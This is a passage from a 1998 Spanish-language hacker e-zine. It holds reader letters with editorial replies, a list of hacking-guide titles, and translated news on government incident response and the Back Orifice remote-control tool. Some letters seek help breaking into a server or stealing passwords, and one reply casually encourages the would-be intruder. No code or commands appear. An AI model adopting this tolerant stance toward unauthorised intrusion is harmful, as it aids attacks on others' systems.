estubo fantastico y parece que esto suma y sigue . Bueno solo queria
contarles que ya hemos terminado el primer nuemro de
Proyecto_R , los invito a que nos den su sincera opinion y criticas
ojala constructivas , para que nos ayuden a mejorar ciertos aspectos del
E-Zine la verdad es bastante pobre (creo yo ) pero tendra que
ir mejorando a medida que se nos unan mas colaboradores . Les adjunto el
primer numero y si puden poner un enlze desde vuestro web como tambien
mencionar la direccion en su E-Zine , estaria eternamente agradecido ...
URL Proyecto_R : http://www.bigfoot.com/~proyecto_r
http://www.geocities.com/colosseum/sideline/9497
GRacias ...----
PlaXiuS .
<------>
[ Claro que os ponemos un enlace :) y a todos nuestros lectores decirles
que pasaros por el url y pillad este nuevo ezine. Nos ha gustado mucho
el ezine y esperamos que siga mejorando. ]
<---------------------------------------------------------------------------->
From: "SPIDER" <jlcastil@xxxxxxxxxxxxxx>
Subject: saludo
Les envio un saludo, y felicitaciones por su magnifica pag.
Espero que esto lo hagan aun mas grande, es genial
hasta pronto...
ATTE: SPIDERIDER
<------>
[ thx, estamos en ello. ]
<---------------------------------------------------------------------------->
Date: Sun, 02 Aug 1998 13:05:55 GMT
From: "Alfredo Kreim" <the_argie@xxxxxxxxxxxxxx>
To: conde_vampiro@usa.net
Subject: Ayuda
Estimado Conde Vampiro: No soy ni H/P/C ni nada que se le parezca. Ni
siquiera soy un Lamer. Mi actividad es el periodismo de investigacion
(corrupcion politica, negociados turbios, etc.). Por supuesto que esto
molesta a algunos y es por eso que me dirijo a uds. para preguntarles si
me pueden dar alguna ayuda. Tengo mis lineas telefonicas pinchadas, o
sea escuchan mis conversaciones. Algunas son importantes para descubrir
cosas sucias y corren peligro mis fuentes de informacion si son
identificadas. Mi requerimiento es: existe algun programa (tengo una
Pentium 100 con Windows 95) que me permita escudriñar la linea y poder
detectar si me estan grabando o interceptando la comunicacion?. De no
existir, conocen algun diseño electronico que permita construir algun
rastreador (que tenga componentes baratos ya que mi cuenta esta vacia)?.
Es posible una vez detectado el hijo de puta fizgon mandarle algo para
que no joda mas?. Desde ya les agradezco todo lo que puedan hacer para
darme una ayuda. Lamento no saber Unix, y tambien lamento no ser mas
joven. Ya cerca de los 50 me resulta un tanto pesado estudiar, aunque
trato de leer algo nuevo de programacion todas las veces que puedo.
Tengo la oportunidad ahora de leer un par de libros para empezar a
programar en Java. Me gustaria me dieran su opinion si vale la pena o
mejor me dedico a seguir persiguiendo politicos sucios. Por ultimo, mi
ingles tecnico no es demasiado abultado, por ello si encuentran algo en
castellano mejor. Un abrazo y sigan asi. Me gusta mucho leer la pagina
JJF Hackers Team. Chau. Alfredo.
<------>
[ Esto me suena a peli de James Bond :), pues decirte que hay varias
empresas que se dedican a estos asuntos. En barcelona y en Madrid tienes
unas tiendas llamadas LA TIENDA DEL ESPIA, en la que podras comprar
encriptadores para las conversaciones telefonicas y mas juguetes.
Y que no te cojan alfredo :) ]
<---------------------------------------------------------------------------->
Date: Tue, 04 Aug 1998 19:03:52 GMT
From: Sergio <carlos29@xxxxxxxxxxxxxx>
To: conde_vampiro@usa.net
Subject: Hola COnde
Hola soy Sergio y me interesaria un buen programa para pasarme los
passwords que me piden las web porno, tengo WINDOWS95 ya me diras
alguna cosa gracias soy carlos29@xxxxxxxxxxxxxx Adios
<------>
[ Por favor !!!!! tenemos mejores cosas que hacer. ]
<---------------------------------------------------------------------------->
From: "Pablo Garcia del Pino" <icelord@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: Problemas en tus URL
Tio:
Muy buena pagina la tuya pero... cuando vas a bajarte por ejemplo los tonos
de la red-box, informacion para red-box etc... Te encuentras el error 404
es decir que el link de URL no existe.
Por favor, este tema me interesa bastante, con lo que a ver si pudierais
enviarme estos archivos, o si no decirme como conseguirlos.
Gracias.
Icelord
http://www.pasanet.es/usuarios/icelord/
icelord@xxxxxxxxxxxxxx
<------>
[ Ya decimos que los linkÔs en los webÔs son dificl de mantener, pero
el webmaster hace lo que puede. ]
<---------------------------------------------------------------------------->
Date: Fri, 14 Aug 1998 18:45:35 GMT
From: Cain <Nod@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: Para el e-zine ( Correo del lector)
Sonara muy tipico.. pero felicidades por vuestra pagina, y gracias por
enseñarnos.... Bueno mejor voy al grano ok? Bien en el e-zine he visto
que explicais cosas sobre el hacking, pero siempre bajo Unix. A alguien
se le ha ocurrido la idea de hacerlo desde Windows? ( No os riais de mi
please ) Soy consciente de que a muchos programadores la simple idea de
trabajar con windows les parece ridicula, y que consideran que es un
sistema para supernovatos... y tal vez sea asi, pero tambien es verdad
que se puede hacer hacking desde windows ®o no? La señorita Carolyn
Meinel asi lo explica, y el señor IPgh0st hace la traducion de dichos
documentos... entonces.. porque no se amplia mas sobre el tema? ®Son
conscientes de que para millones de usuarios, que usan Windows por
motivos varios les seria mucho mas facil trabajar desde este "®Sistema?"
( Lo pongo entre comillas para que nadie se me ofenda ok?) Bueno pues lo
dicho, creo que seria interesante abarcar esa posibilidad, aqunue soy
consciente que es una tarea un tanto pesada... Igualmente estoy
convencido que se haria un gran favor a los aprendices de hackers (
Incluyendome entre ellos).
Gracias por dedicar su tiempo a mi e-mail, y espero seguir
disfrutnado de su informacion, y de sus sabios consejos.
And he exilied me
To wander in darkness
The land of Nod
I flew into the darkness
I saw no source of light
And I was afraid
And Alone.
Fragment of Book of Nod.
Cain.
<------>
[ Thx, ® Pero quien dice que no tocamos nada sobre windows ?, pues
seguro que este numero te gustara :), ademas nosotros estamos trabajando
en varios proyectos para windows que iran saliendo durante este año.
Pero esperamos que los lectores tambien nos envien articulos sobre
windows. ]
<---------------------------------------------------------------------------->
Date: Mon, 17 Aug 1998 19:28:58 GMT
From: "ZeD" <ZeD@xxxxxxxxxxxxxx>
Subject: varias cosas
hola os mando esto para deciros varias cosas,la primera es que lei una
carta de un lector en el n°5 de la revista,que decia que le gustaria que en
vuestro e-zine saliese una especie de "dicciohack",la verdad es que no me
parece mala idea,ya que muchos de los terminos que se usan cambian de
nombre y ademas no siempre se conocen todos,ya que salen nuevos cada muy
poco tiempo.
en segundo lugar queria comentar a todos los que os escriben diciendoos que
quieren aprender hackear,que si lo haces bien,le pones empeño ypor supuesto
no es una "vena" transitoria de esas que nos dan a todos de vez encuando
despues de leer o ver alguna azaña en television o en algun periodico,no es
tan dificil aprender y desde este como desde muchos e-zines y webs podeis
ir aprendiendo (poco a poco claro,esto noes algo que se prenda en dos
semanas),existen mogollon de libros sobre seguridad informatica,sistemas
operativos...ect... que si los lees,puedes parender muchas cosas,ademas ®no
dicen que en internet esta todo? pues buscad guias de iniciacion o
documentos para "newbyes" (o como coñe se scriba la palabreja esa).
la tercera cosa que queria comentaros es una cuestion que me preguntaron el
otro dia en un canal de irc y la verdad es que no supe contestarte,la
pregunta que me hicieron es la siguiente:
"®se puede hackear (se referia a entrar en un sistema,obviamente) desde
windows95?" yo la verdad es que no lo se y apartir de que me hizieran esa
pregunta,a mi tambien me corroe la curiosidad,como ya se que si se puede no
vais a decir el como,no os lo pregunto,simplemente me gustaria un "si" o
un "no" ;-)
mas cosillas,como decis vosotros sin colaboracion no hay trabajo,por lo
tanto les mando tres textos para que,si quereis los incluyais en el proximo
n° de vuestro e-zine.el primero es sobre como trucar el windows95,aqui
explico la manera de adecuar el SO mas utilizado (por desgracia o por
fortuna,segun para quien),al gusto del usuario y no al de los creadores del
jodio sistema en cuestion.
el segundo es una especie de guia para el irc en la que explico como
conseguir cosas (contraseñas...etc...) por medio de ingenieria
social,tambien incluye una pequeña guia de como usar dos de las tools que
hay para los famosos PWL.
el tercer texto va dedicado a los phreackers novatos o gente que se quiera
iniciar en este campo,entre las cosas que se comentan en este texto incluyo
una descripcion de algunas de la BOX mas conocidas.os los mando los 3
comprimidos en un zip para que ocupen menos y no tardeis mucho en bajaros
este e-mail.
deciros que soy miembro del grupo HaCk`S-wEb-RiNg y que siempre que sale un
nuevo n° de vustro e-zine lo pillamos rapidamente por que mola mazo y
deciros que en nombre de todo el grupo,os mandamos un saludo,si quereis
visitar nuestra web....
lo llevais claro por que todavia esta "under construccion" pero ya le falta
menos y cuando este acabado en los link`s pondremos uno a vuestra web,que
mola mazo ®fale? :-)
por cierto (ya acabo) en algunos e-zines (no voy a decir cuales) tienen una
"lista de correo" en la que avisan cuando sale un nuevo n° ®por que no
haceis vosotros lo mismo?
bueno siento averos dado la barrila pero he tardado en decidirme a
escribiros y ahora lo suelto todo de golpe ;-)
un saludo y feliz HaCk (esto me suena) bye
{ ZeD ----- http://www.angelfire.com/ak/HACKZED/ZED2.html ------ }
esta es la direccion de mi web,por si la quereis poner en el e-zine
<------>
[ Sobre un diccionario hack ya hemos pensado sobre ello y mas adelante ya
veras :) Decirte sobre win95 "SI". Sobre el mailing list estamos en ello,
pero no hemos dicho nada ya que dentro de poco habra cambios radicales en
el website ;-)
Thx por tus artis y nos gusta que otros grupos nos apoyen, saludos de
- J.J.F. / HACKERS TEAM -, por cierto hemos visto tu ezine y tu web :)
y decirte que este ezine se llama J.J.F. / HACKERS TEAM JOURNAL. byes ]
<---------------------------------------------------------------------------->
From: "Pepe Pepe2" <sir_ich@xxxxxxxxxxxxxx>
To: conde_vampiro@usa.net
Subject: Sir Ich
Hola conde soy Sir Ich, estoy leyendome los articulos que realizas sobre
hackers y quisiera saber si podrias decirme algun texto mas donde
empezar porque quiero aprender en esto del hack.
Por cierto me gustaron bastante tus articulos.
Lo que me gustaria es que me enseñaras o que me dieras consejos o textos
sobre como empezar en esto del hack.
Bueno sin mas me despido hasta la proxima esperando tu respuesta.
Muchas gracias por leer esta carta y por haberme atendido.
Mi correo es sir_ich@xxxxxxxxxxxxxx
<------>
[ Bueno pues logicamente tienes nuestro/vuestro ezine que es un medio ideal
para aprender, pero no solo de textos vive el hacker :)
Nuestro consejo es el de siempre, estudia, aprende y mejora las cosas. ]
<---------------------------------------------------------------------------->
Date: Tue, 18 Aug 1998 16:54:02 GMT
From: "Alfredo Kreim" <the_argie@xxxxxxxxxxxxxx>
To: conde_vampiro@usa.net
Cc: mr.electro@usa.net
Subject: Ayuda
Muchachos, estoy en un problema. Soy periodista y hago notas
investigando a politicos corruptos, policias corruptos, jueces
corruptos, en fin, a toda la lacra que anda dando vueltas por ahi.
Descubri que me pinchan mis lineas telefonicas y escuchan y graban mis
conversaciones, lo que -por supuesto- me jode y ademas pone en riesgo a
mis informantes (gente decente que cree que los hijos de puta tienen que
estar en una jaula y los buenos disfrutar la vida). Primera pregunta:
®hay algun programa que me permita descubrir con certeza la pinchadura y
localizar al espia?. Segunda pregunta: Si existe, ®es posible bloquear e
impedir que me escuchen y graben?. Tercera pregunta: ®Hay manera de
romperles el culo cagandoles el equipo que estan usando?. Cuarta
pregunta: Si todo lo anterior es negativo, ®habra por ahi planos y
manuales en castellano para construir algun aparatito electronico que
realice la tarea descripta mas arriba?. Si necesitan mas datos acerca
del tipo de central y equipos que tiene la proveedora del servicio
telefonico, avisenme que lo averiguo y se los paso. Muchas gracias desde
ya, y quedo a la espera de alguna novedad de uds. Un abrazo.
Alfredo
<------>
[ Otra vez el espia !!! Pues ya te hemos dado la respuesta mas arriba, y
estas cosas si que se pueden realizar pero tienes que ser un manitas en
phreaking y por supuesto electronica, hhhuum cosa que veo dificil. ]
<---------------------------------------------------------------------------->
Date: Sun, 23 Aug 1998 15:30:31 GMT
From: "ADRIAN" <admar@xxxxxxxxxxxxxx>
Subject: me_gusta_mucho_la_presentacion__
Bueno tienen un monton de programas buenisimos,y actuales, se ven poco por
la red asi que sigan adelante muchachos ,otra cosa me mandan la direccion
de la pagina en internet?
es que la encontre en un buscador cabron que no me deja ver la direccion..
<------>
[ Pues facil, cuando te pones encima de nuestro enlace en ese buscador
seguro que te sale nuestro url abajo a la izquierda en tu navegador.
Ademas si pinchas encima te sale nuestro url en el prompt del navegador
y encima nuestro url sale en nuestro ezine, creo que mas facil no se
puede :) ]
<---------------------------------------------------------------------------->
Date: Sat, 29 Aug 1998 08:20:37 GMT
From: "Ana Maria Hermida" <ahermida@xxxxxxxxxxxxxx>
To: conde_vampiro@usa.net
Hola
Estoy algo desesperado y no se que hacer. Llevo mas de 5 meses
intentando entrar en un server.
He sacado mucha informacion sobre los ordenadores que estan en su red
(tengo mas de 20) y sobre
los protocolos que otiliza en cada uno de sus puertos, asi como los
dorectorios que exporta.
Pero parece que todas las versiones estan libres de bugs ... que puedo
hacer? como podria
entrar en alguno de esos server? En todos los manuales y articulos de
las revistas pone que
es muy facil y blablabla pero yo no consigo nada ... y eso que tengo
buenos conocimientos de
informatica :(
Me puedes echar una mano? gracias
<------>
[ Pues que decir, no conozco ningun sistema perfecto libre de bugs.
No estaras enfocando correctamente la situacion, revisa a fondo toda la
informacion que has recopilado. Pero si tan frustado estas mejor dejalo,
en el hack no todo son alegrias y exitos. ]
<---------------------------------------------------------------------------->
Date: Sat, 29 Aug 1998 09:57:42 GMT
From: "ZeD" <ZeD@xxxxxxxxxxxxxx>
Subject: virus muy raro
hola vereis no se si os acordareis de mi (os mande tres textos hace una dos
o tres semanas) tengo un "pequeño" problema con algo que creo puede ser un
virus a ctualmente estoy usando el WINDOWS95 y hoi (29/8/98) se me a
activado lo que creo puede ser un virus lo que hace este es lo siguiente
al abrir cualquier cosa con el NOTEPAD (solo con el note,con el wordpad no
me pasa nada)
la pantalla se me llena de iconos de error (el del windows que es un
circulo rojo con una "X" blanca en medio)
estos los puedo "borrar" si paso por encima de ellos el documento que he
abierto
me pasa lo mismo cuando intento conectarme a internet y tambien los puedo
borrar si paso el cuadro de dialogo
(el de "conectando a internet") por encima de ellos.
actualmente uso el antivirus ANYWARE y este no me detecta nada raro y la
verdad no se de que virus se puede trar y mucho menos como eliminarlo.
yo la verdad es que de virus no tengo ni idea,por eso recurro a vosotros
aver si,vosotros o alguno de vuestros lectores saben como poder ayudarme
con el "virus" (o lo que sea).
si vosotros no podeis ayudarme y publicais esto en el e-zine poned esta
direccion de correo para que me contesten (si alguien sabe la respuesta
claro) la dire es: zed@mixmail.com
bueno,no os aburro mas un saludo
\\'//
(o -)
-ooO--(_)--Ooo-
--..--ZeD--..--
http://www.angelfire.com/ak/HACKZED/ZED2.html
http://come.to/HaCkS-wEb-RiNg
!visitalas°
!!EL DIA 3/9/98 TODOS A LA HUELGA°°
<------>
[ Es la primera vez que oigo semejante historia, si esto es un virus lo
desconozco pero huele mas al tipico programa bromista de win95, has
mirado en Inicio o en el registro, en busca de algo sospechoso. ?
Si algun lector reconoce estos sintomas pues que nos escriba. ]
<---------------------------------------------------------------------------->
Date: Sun, 30 Aug 1998 16:58:52 GMT
From: Muerte <necrolibro@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: Red IRC Union Latina
NecroSaludos,
Pueeee... no habia descubierto su e-zine hasta hace poco, y ke esta
muuu bien y es muu interesante. A parte, me gustaria incluir un link a
su pagina, pues eso dense una vuelta por la web de abajo del tooo (si la
de Necronomicon...) y se meten en la Guia de Temas Olvidados y luego en
Añadir un Enlace y rellenan el formulario, pa meterles un enlace dentro
de la seccion Red. Ke porke no se lo meto yo... pues porke no se ke
descripcion meterles, y como ya hice con SET les escribe un e-mail y les
dije ke me dijesen una descripcion, y luego yo la meto...
A parte de esto... pasando al tema ke me ocupa. Seguro ke ustedes
conocen mazo de redes de IRC, pero Hispanas, pueee seguro ke conocen el
IRC-Hispano, øpero y a parte de esa?, ninguna tal vez, pues yo les
escribo esto pa decirles ke hay una alternativa al IRC-Hispano y se
llama... Union Latina, sus servers son los siguientes:
Union Latina: Comunet (ES, Bilbao): comunet.unionlatina.org
Union Latina: Digital (ES, Madrid): madrid.unionlatina.org
Union Latina: Dragonet (ES, Alicante): dragonet.unionlatina.org
Union Latina: Interlink (ES, Madrid): interlink.unionlatina.org
Union Latina: Lander (ES, Madrid): lander.unionlatina.org
Union Latina: Telebase (ES, Alicante): telebase.unionlatina.org
Union Latina: Tinet (ES, Tarragona): tinet.unionlatina.org
Su pagina web oficial es:
http://www.unionlatina.org
Su bot es KaOs, y no tiene nada ke ver con el amigo Scytale. Pues pa ke
les interesa esto, seguro ke hay mazo de gente, como yo, ke somos
usuarios de proveedores de bancos y ke tenemos la entrada prohibida
(G-Line) al IRC-Hispano o ke estamos hasta los g¸evos de tanto
IRC-Hispano... Pues ya tienen una alternativa real. Seguro ke si se dan
una vuelta les convence...
Pues nada solo keria ke dieran a conocer esta info en su e-zine, si pa
ke la gente sepa ke hay una alternativa a la Red IRC-Hispano. Y ke esta
muy bien esa alternativa se llama Union Latina y sus IRCops son muuu
majos.
Pues naaa maxx... si puedo ayudarles en algo diganmelo.. y sigan asi y
pa mas arriba...
Mushas gracias por tooo y sigan asi...
Un Saludo de Muerte (Director del Necronomicon)
NECRONOMICON (El Libro de los Muertos)
http://members.xoom.com/necrolibro
EN EL IRC:
Nick: |Muerte
Lugar: #necronomicon en Union Latina
Todos los sabados y domingos sobre las 16:00
<------>
[ Thx pero nosotros ya conociamos la existencia de esta red de IRC en
España junto con la de Hispanos y otras academicas.
Pero para el que no lo sepa ya no tiene excusa :) ]
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
------------------------
- NOTICIAS UNDERGROUND -
------------------------
- J.J.F. / HACKERS TEAM -
<---------------------------------------------------------------------------->
INDICE DE LAS NUEVAS Guide to (mostly) Harmless Hacking
# Vol. 5 Programmers' Series
No. 2: Shell Programming: an Exploit Explained, Part 1
# Vol. 5 Programmers' Series
No. 2: Shell Programming: an Exploit Explained, part 2
# Vol. 5 Programmers' Series
No. 3: More on Advanced Unix Shell Programming
# Microsoft-only version Number 1
Getting Serious with Win95
# Microsoft-only version Number 2
Hacking with Win95/NT: Batch File Programming
# Microsoft-only version Number 3
Hacking with Win95/NT: How to Telnet
How to Break into a Windows 95 Computers from the Internet
# Vol. 3 No. 7, Part 1
Introduction to Computer Viruses
# Vol. 3 No. 7, part 2
Introduction to Computer Viruses
# Vol. 6 Real Hackers
No. 2: Harold Willison
# Vol. 3 No. 8, Part 1
The Magical Mystical Crypto-Primer
# Vol. 3 No. 8, Part 2
The Magical Mystical Crypto-Primer
<---------------------------------------------------------------------------->
® QUIEN SE QUIERE PROTEGER DE LOS HACKERS ? EL GRUPO SHADOW LO SABE.
OTC 7/23/98 8:25 AM
WASHINGTON, D.C., U.S.A., 1998 JUL 23 (Newsbytes) --
By Shawn P. McCarthy, Government Computer News.
Los Hackers han ayudado a romper las redes del gobierno. Ellos
comparten sus recursos y tecnicas en determinadas listas de correo y en
areas de chat encriptadas. Los adminstradores de seguridad del Gobierno
Americano estan formando grupos similares para combatir de una forma mas
eficaz a los intrusos.
Un pequeño grupo de experto en seguridad del gobierno han estado
usando este metodo con el sector opuesto de la industria. El intercambio
a servido para formar un concenso, no del todo aceptado, sobre que hacer
cuando una red privada a sido penetrada por un intruso via Internet.
El grupo Shadow incluye representantes de diferentes departamentos
de defensa, Laboratorio Nacional de los Alamos. Los representantes
corporativos provienen desde General Dynamics Corp hasta Disney Online.
Dos grandes esfuerzos han sido obtenidos en este proceso. El primero
es un libro: Computer Security Handling Step by Step. Publicado por Sans
Institute of Bethesda, Md., disponible en http://www.sans.org, el libro
cuesta $27 y discute como combatir a un intruso, ataques denial of
service, cyberladrones y otros temas de seguridad.
El libro cita seis estados de responsabilidad: preparacion, deteccion,
contencion, eradicacion, recuperacion y seguimiento. Pero se enfoca mas en
la parte de preparacion. Hace hincapie otra vez en proteger la red antes
de que sea atacada.
El grupo Shadow encontro que un buen lugar para empezar es justificar
un gasto para invertir en una infraestuctura de seguridad. Tambien encontro
que muchos sitios no tienen una solida politica de seguridad o incluso una
filosofia en vez, que relentiza y complica las cosas cuando los incidentes
ocurren.
"Cada uno debe escoger la filosofia que ahi que seguir y conseguir
presupuesto," dice Northcutt, antes de formular un plan de responsabilidad.
Y el grupo aprendio que todos necesitan entrenamiento en el area de
seguridad.
El grupo decidio que lo que funciona con organizaciones grandes no
siempre funciona con las pequeñas. Grupos grandes han dedicado personal
para contener los incidentes. Las pequeñas generalmente emplean a un solo
miembro cuando ahi indicios de penetracion.
Un inadecuado administrador de red, por exemplo, puede estar usando
una cuenta privilegiada que el administrador nunca haya usado antes. Eso
le daria pistas al intruso de que ha sido descubierto, por lo que el
intruso podria destruir las evidencias y causar otro tipo de daños.
Las discusiones del grupo Shadow revelan los puntos de los ataques
Hackers. Los miembros coinciden en las maneras de como combatir contra
codigo malicioso (usando antivirus, scanners para paquetes inexplicables
enviados automaticamente desde tu red hacia Internet).
Ellos tambien coinciden en realizar pruebas y network mapping
(probando uno mismo puede aprender muchisimo sobre el funcionamiento de su
red). Ellos tambien discuten sobre denial of service (estableciendo una
facilidad de backup), organizaciones de espionaje (seguir el trafico,
incluso falsificar informacion para despitar al intruso), hoaxes (mantener
a los empleados informados, por ejemplo en http://ciac.llnl.gov), y
acceso no autorizados (restringir las conexiones IP permitidas).
Sorprendentemente, Northcutt dijo que el no esta muy concenciado de
ataques con scriptÔs en algunos sitios.
"La busqueda de informacion es la mejor forma de concerciarme" dice
el. "En varios casos, hemos notado varios intentos de ataques, que indicaban
que el intruso conocia la estructura de nuestro sistema."
Los departamentos del DOD acuden rapidamente a sus equipos de
respuesta ante incidentes informaticos para recibir ayuda inmediata. Un
ejemplo de esto, esta en http://www.assist.mil
El segundo resultado que concluyo el grupo Shadow se llama
Cooperative Intrusion Detection Evaluation and Response project o tambien
conocido como CIDER. Tambien un projecto del Instituto Sans, con la
cooperacion de la Marina, con el fin de ayudar a las organizaciones a
construir defensas propias.
El CIDER se concentra en dos tecnicas. La primera es el TCPdump, un
programa que monotoriza y filtra la actividad TCP a base de unas reglas
cuando aparece un problema. La segunda es Network Flight Recorder, un
conjunto de herramientas todavia en desarrollo para monotorizar, archivar y
alertar a las autoridades.
Los detalles del CIDER estan disponibles en
http://www.nswc.navy.mil/ISSEC/CID/ . Cuando lo visitas, se puede bajar
una copia shareware. Pero a causa de la cantidad de log's que genera, es
recomendable añadir mas cantidad de disco duro para que funcione
correctamente. La herramienta viene con una buena documentacion.
Finalmente, lleva en mente que no en todos los casos de recuperacion
resultan ataques de hackers. Casos externos tambien incluyen desastres
naturales, descuidos y fallos en los equipos. Teniendo un plan de
responsabilidad y un plan de recuperacion es el primer paso para controlar
la perdida de servicio.
Para una lista de herramientas de seguridad, visitar
http://www.perl.com/latro
Para monotorizar un grupo de UseNet que discute sobre temas de
seguridad, comprobar las comp.sys.www.security o comp.infosystems.www.cgi
Ver The Best of Security en best-of-security@requestcyber.com.au o
en los diferentes equipos del CERT, cert-advisory-request@cert.org
Shawn P. McCarthy es un periodista informatico, webmaster y
programador de Internet para Cahners Business Information Inc.
Reported by Government Computer News: http://www.gcn.com
<---------------------------------------------------------------------------->
LA LUCHA POR LA HABILIDAD AUMENTA.
12Aug98 USA: RANDOM NEWSBYTES -
By Tony Waltham
La semana pasada los hackers se reunieron en las vegas en una
conferencia conocida como Defcon VI, pero por lo general el evento no tiene
mucha publicidad excepto en esta ocasion que a sido de principal noticia en
CNN, ZDNet y la revista Wired cuando un grupo de hackers que se
autodenominan "the Cult of the Dead Cow" anuncio una nueva potente
herramienta que permite el acceso remoto a maquinas Windows 95 o 98.
Esta utilidad autocontenida y que se instala por si misma permite
a sus usuarios controlar y monotorizar ordenadores que corren el sistema
operativo Windows en una red. Y este software puede ser obtenido de forma
gratuita en Internet.
Conocida como Back Orifice, ironicamente parecido al BackOffice de
Microsoft, principalmente provee unas potentes capacidades para el hacking
que pueden ser usadas contra cualquier ordenador con la plataforma Windows.
Microsoft respondio de inmediato restando importancia en las
capacidades de Back Orifice, mientras que un experto en seguridad de
Microsoft dijo que el programa no representa un gran problema a los
usuarios finales de Windows. Back Orifice es solo otra herramienta que un
administrador puede instalar en una red para monotorizar esta... para
examinar el sistema, explico.
Por otro lado, la revista Wired indica que esta postura es demasiado
blanda, y publico un analisis de un consultor independiente de seguridad
llamado Weld Pond, del grupo L0Pht Heavy Industries con sede en Boston (la
cual es una organizacion hacker) que contradice la opinion de Microsoft.
Diciendo: "Se puede controlar el sistema de ficheros y tambien el
registro - es realmente sencillo... (usa) un interface de web...
Se puede subir cualquier fichero en el sistema o bajar cualquier fichero
desde cualquier sitio en Internet."
Lo que esta herramienta pone de manifiesto es el alto riesgo que
demuestran ser las redes de ordenadores y sus estandar para los hackers.
Desafortunadamente, al ser una herramienta tal facil provocara un
crecimiento en entradas ajenas a los ordenadores, en vez de estimular una
mayor vigilancia en los usuarios, provocando una mayor vulnerabilidad en las
redes informaticas.
La Defcon VI atrajo a unos 1.000 hackers (ademas de would-b hackers),
pero su numero aumenta por el mundo entero.
Consultores expertos en seguridad han dicho que ahora existen unos
50.000 hackers, mientras que algunos estiman mas incluso, especialmente si
se consideran los wannabees.
Otro experto, Charles Palmer, el cabezilla del grupo de IBM "ethical
hackers" miro el problema de forma diferente, y reconocio que existen unos
100 hackers realmente peligrosos por el mundo hoy en dia.
Una de las actividades de este grupo es extraer pruebas de los
sistemas que han sido invadidos, buscar evidencias forenses como por ejemplo
fragmentos de codigo en las herramientas usadas, pero dejadas escondidas en
el sistema.
Hoy, el anonimato de la World Wide Web y la publicidad que los ataques
generan - especialmente aquellos sistemas importantes en Internet que han
sido hackeados - estimulan esta labor.
® Realmente es tan grave el problema del hacking ?
Considerando esta estadistica : En un periodo de 12 meses se han
registrado unos 250.000 intentos de entrada en los ordenadores de US Air
Force, segun las noticias de ZDNet. Despues fueron robados en 1996 de una
surcusal del Citibank unos 10 millones de dolares. Esto indica el serio
peligro de los intrusos informaticos. Ninguna red puede considerarse inmune
contra los intrusos, fuera de la compañia o dentro de ella, y aumentar la
seguridad debe ser una de las principales tareas de una empresa. Al igual
que el dinero es guardado en sitio seguro, los datos tambien lo deberian
estar.
E incluso los cerrojos y las llaves (palabras de paso) tiene que ser
cambiados frecuentemente, mientras aquellos encargados de uan red de
ordenadores tienen que estar alerta de los avisos de seguridad que van
apareciendo que conciernen a los diferentes sistemas operativos o las
aplicaciones asi como las nuevas fallos que se van descubriendo y publicados
casi diariamente.
Los expertos en seguridad constantemente avisan que nunca es
suficiente concenciarse sobre la importancia de la seguridad y sobre los
aparentes sistemas informaticos detras de un cortafuegos, etc. pueden ser
facilmente comprometidos por un experto hacker o un espia industrial.
Recientemente tuve una charla con un experto en seguridad de la
empresa Sun Microsystems quien me explico que en Sun existe una regla
fundamental: Si alquien pone un modem en la red de la corporacion sera
gravemente penalizado.
(Esto puede ser un punto vulnerable de una red. Un empleado quien
necesita llamar a Internet a lo mejor conecta un modem en la red de su
desktop - y no cuenta nada al encargado porque existe una estricta politica
en este aspecto y ademas estan demasiados ocupados para ayudar.)
Los Hackers generalmente no actuan con intenciones criminales, pero
en algunos casos como el de Citibank ilustra que una cosa puede llevar a la
otra.
Aqui, la experencia de conseguir acceso y controlar sistemas
informaticos de bancos fue desarrollado por un grupo de Hackers rusos que
estaban interesados en obtener ventajas economicas. La etica Hacker para
estos intrusos fue como exploracion y no para robar.
Por otro lado, drogado y depresivo, uno de los Hackers vendio los
secretos por $100 y 2 botellas de vodka, permitiendo que las organizaciones
criminales pudiesen robar 10 millones de dolares.
El tema de hacking nunca desaparecera, y por el momento casi nunca es
inocente - pero si destructivo - muchos de ellos se interesan en poder
saltarse las barreras de los sistemas informaticos, en algunos casos puede
costar caro cuando los datos han sido accidentalmente borrados o
comprometidos.
Es el juego del gato y el raton, reflejando un lado perveso en la
naturaleza del hombre (como los virus informaticos, que son destructivos
o benignos.)
Pero es una larga carrera, como el coste del fraude con tarjetas
de credito, cualquiera puede ser el que tenga que pagar a un experto en
seguridad para examinar el daño que su sistema a sufrido por la actividad
hacking.
Por supuesto prevenirse es la mejor cura. Es mejor minimizar el coste
de una actividad hacking manteniendo a un experto en seguridad o un
consultor y poder mantener un buen nivel de productividad.
Es tambien critico mantener al dia los riesgos, los peligros y las
apropiadas acciones a seguir en caso de riesgo en esta lucha por la
habilidad.
Tony Waltham es el editor de Database.
BANGKOK POST 12/08/98 P7
<---------------------------------------------------------------------------->
EL NT EN EL PUNTO DE MIRA DE LOS HACKERS.
13Aug98 USA.
Los Hackers que han distribuido un programa para controlar
remotamente el Windows 95 y 98 han avisado que pueden sacar una version
para el Windows NT, escribe Steve Ranger.
El grupo americano the Cult of the Dead Cow (cDc) la semana pasada
distribuyo el Back Orifice, una herramienta que permite tomar el control
desde un PC a otro PC sin el conocimiento del usuario.
El cDc dice que el Back Orifice a sido bajado del web durante los
cuatro primeros dias desde que fue puesta unas 35.000 veces.
Una version que permite a los Hackers controlar una maquina basada en
Windows desde Unix a sido distribuida, y el cDc dice que esta trabajando en
una version que permita controlar remotamente el NT.
Microsoft alega que los usuarios que usen procedimientos de seguridad,
como servidores proxy, cortafuegos y no bajan ningun tipo de codigo desde
sitios desconocidos deberian estar a salvo de esta herramienta.
El cDc desmienta esto. 'Existen varias maneras de que el programa
corra en un ordenador Windows, no solo sin la aprobacion del usuario, pero
si sin el conocimiento del usuario,' dice el portavoz del cDc.
Paul Ducklin, cabezilla del grupo de anti-virus Sophos, dice que el
Back Orifice 'es un programa que hace lo que dice - control remoto en un
Windows 95'.
El Back Orifice da la oportunidada a los Hackers de controlar casi
todas las partes del sistema incluyendo el registro, el sistema de ficheros
y la teclas pulsadas. La herramienta de administracion remota tambien puede
ser usada legitimamente para soporte tecnico remoto o administracion remota
de una red.
COMPUTING 13/08/98 P2
<---------------------------------------------------------------------------->
- J.J.F. / HACKERS TEAM - ESTUVO CON L0PHT EN MIT.
